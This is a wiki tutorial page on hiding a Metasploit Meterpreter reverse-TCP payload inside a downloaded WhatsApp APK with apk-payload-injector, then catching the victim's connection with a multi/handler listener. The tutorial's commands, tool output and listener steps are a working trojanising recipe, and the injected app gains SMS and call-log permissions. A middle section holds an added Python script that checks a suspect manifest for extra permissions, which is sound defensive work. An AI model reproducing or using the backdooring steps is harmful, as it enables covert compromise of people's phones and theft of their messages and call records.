Difference between revisions of "MSF: Embed MSF exploit di ori apk"

From OnnoWiki
Revision as of 10:34, 1 June 2017

Source: https://techkernel.org/2015/12/11/embed-metasploit-payload-in-apk-easily/


One of the problems with attack techniques against Android is how to make the attack payload we build with Meterpreter in Metasploit look like a legitimate application that the victim will install. To do that, we need to embed the payload we generated with Metasploit into a legitimate application.

PREREQUISITES

  • Prepare a laptop / VM with Kali Linux.
  • Tool used: apktool

STEP 1:

  • Find the original apk
  • Google keyword "app_name apk download", for example "whatsapp apk download"

For the WhatsApp apk

  • Go to
http://www.androidapksfree.com/apk/whatsapp-apk-latest-version-download/
http://pollux.androidapksfree.com/polluxdata/6cc0605e4a0f974c583e1d506a5f538e/com.whatsapp_v2.17.200-451830_Android-4.0.apk
  • the file is
com.whatsapp_v2.17.200-451830_Android-4.0.apk


STEP 2:

Download the Ruby script from

https://github.com/SkullTech/apk-payload-injector

or use the CLI

wget https://github.com/SkullTech/apk-payload-injector/archive/master.zip
unzip master.zip

Save the apk & the ruby script in the same folder

mv com.whatsapp_v2.17.200-451830_Android-4.0.apk apk-payload-injector-master/

STEP 3:

In the Kali Linux CLI, check the IP address of Kali Linux (for example 192.168.0.104)

ifconfig -a

In the Kali Linux CLI, embed meterpreter into the apk (use the file name of the apk you downloaded in STEP 1)

cd apk-payload-injector-master/
ruby apk-embed-payload.rb com.whatsapp_v2.17.200-451830_Android-4.0.apk -p android/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=4895


The output will look roughly like this:

[*] Generating msfvenom payload..
[*] Signing payload..
[*] Decompiling orignal APK..
[*] Decompiling payload APK..
[*] Locating onCreate() hook..
[*] Copying payload files..
[*] Loading original/smali/com/whatsapp/Main.smali and injecting payload..
[*] Poisoning the manifest with meterpreter permissions..
[*] Adding android.permission.CALL_PHONE
[*] Adding android.permission.READ_SMS
[*] Adding android.permission.SET_WALLPAPER
[*] Adding android.permission.READ_CALL_LOG
[*] Adding android.permission.WRITE_CALL_LOG
[*] Rebuilding com.whatsapp_v2.17.200-451830_Android-4.0.apk with meterpreter injection as com_backdoored.apk..
[*] Signing com_backdoored.apk ..
[+] Infected file com_backdoored.apk ready.

File name

com_backdoored.apk

If you are less lucky, payload-injector may not be able to find the Activity it has to bind to. In that case we need to open the folder

original

Do the following:

  • Open / edit AndroidManifest.xml
  • Find the <activity> tag that contains both the text ‘.MAIN’ and ‘.LAUNCHER’.
  • Find the ‘android:name’ attribute of that tag and note the name of the Activity.
  • Repeat the process; when the ruby script asks for the Activity, enter the number corresponding to the Activity name you noted earlier and press ENTER.
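The same manifest details matter from the reviewer's side: the injector output above shows it adding permissions such as READ_SMS and READ_CALL_LOG, and the hook lands in the MAIN/LAUNCHER activity. The following added Python script (not part of the original page or of apk-payload-injector) checks a decoded AndroidManifest.xml of a suspicious apk against a known-good copy: it reports permissions that were added and lists the launcher activity whose smali should be inspected. The two manifests are constructed samples, not real WhatsApp files.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
NAME_ATTR = f"{{{ANDROID_NS}}}name"   # ElementTree key for android:name

# Constructed sample manifests (not real WhatsApp files). The second one carries
# some of the extra permissions listed in the injector output above.
ORIGINAL_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.app">
  <uses-permission android:name="android.permission.INTERNET"/>
  <application>
    <activity android:name=".Settings"/>
    <activity android:name="com.example.app.Main">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
  </application>
</manifest>"""

MODIFIED_MANIFEST = ORIGINAL_MANIFEST.replace(
    '<uses-permission android:name="android.permission.INTERNET"/>',
    '<uses-permission android:name="android.permission.INTERNET"/>\n'
    '  <uses-permission android:name="android.permission.READ_SMS"/>\n'
    '  <uses-permission android:name="android.permission.READ_CALL_LOG"/>\n'
    '  <uses-permission android:name="android.permission.WRITE_CALL_LOG"/>',
)


def launcher_activities(manifest_xml):
    """android:name of every <activity> whose intent-filter has MAIN + LAUNCHER."""
    root = ET.fromstring(manifest_xml)
    found = []
    for activity in root.iter("activity"):
        for intent_filter in activity.findall("intent-filter"):
            actions = {a.get(NAME_ATTR) for a in intent_filter.findall("action")}
            cats = {c.get(NAME_ATTR) for c in intent_filter.findall("category")}
            if "android.intent.action.MAIN" in actions and "android.intent.category.LAUNCHER" in cats:
                found.append(activity.get(NAME_ATTR))
    return found


def permissions(manifest_xml):
    """Set of <uses-permission> names declared at the manifest top level."""
    root = ET.fromstring(manifest_xml)
    return {p.get(NAME_ATTR) for p in root.findall("uses-permission")}


def added_permissions(original_xml, suspect_xml):
    """Permissions present in the suspect manifest but absent from the known-good one."""
    return sorted(permissions(suspect_xml) - permissions(original_xml))
```

Run it against the `original/AndroidManifest.xml` that apktool produces for a downloaded apk and the manifest decoded from the vendor's own build; any permission surfacing in the diff is the first thing to explain.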

PROFIT?!:

In the Kali Linux CLI, type

msfconsole

then enter

use multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST 192.168.0.104
set LPORT 4895
exploit

Wait until the victim's Android device connects back


References